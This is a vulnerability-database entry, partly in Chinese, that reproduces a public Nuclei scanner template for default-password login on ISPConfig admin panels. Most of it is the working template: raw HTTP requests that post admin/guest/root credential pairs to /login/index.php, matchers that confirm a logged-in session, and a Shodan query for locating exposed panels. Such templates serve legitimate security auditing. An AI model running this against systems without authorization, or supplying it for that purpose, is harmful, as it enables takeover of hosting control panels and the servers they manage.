ispconfig-admin-default-login: ISPConfig Admin - Default Password

日期: 2025-08-01 | 影响软件: ISPConfig Admin | POC: 已公开

漏洞描述

ISPConfig Admin Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.

PoC代码[已公开]

id: ispconfig-admin-default-login

info:
  name: ISPConfig Admin - Default Password
  author: pussycat0x
  severity: high
  description: |
    ISPConfig Admin Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
  metadata:
    verified: true
    max-request: 9
    shodan-query: "http.title:\"ispconfig\""
  tags: default-login,ispconfig,vuln

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /login/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Origin: {{BaseURL}}
        Connection: close
        Referer: {{RootURL}}/login/

        username={{username}}&password={{password}}&s_mod=login&s_pg=index

      - |
        GET /sites/web_vhost_domain_list.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}/index.php

    attack: pitchfork
    payloads:
      username:
        - 'admin'
        - 'guest'
        - 'root'
      password:
        - 'admin'
        - 'password'
        - 'toor'

    stop-at-first-match: true
    host-redirects: true

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - Tools
          - Websites
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402207e0e4359c88e0e54bae31f0d8c6226636dfb0cc17c2d0790a8aba09d012db5ed02204918efde91d1d5ef81976d731cf0b59a3302ff81a42ecaf6cdc4a9aa4d5052a7:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/ispconfig/ispconfig-admin-default-login.yaml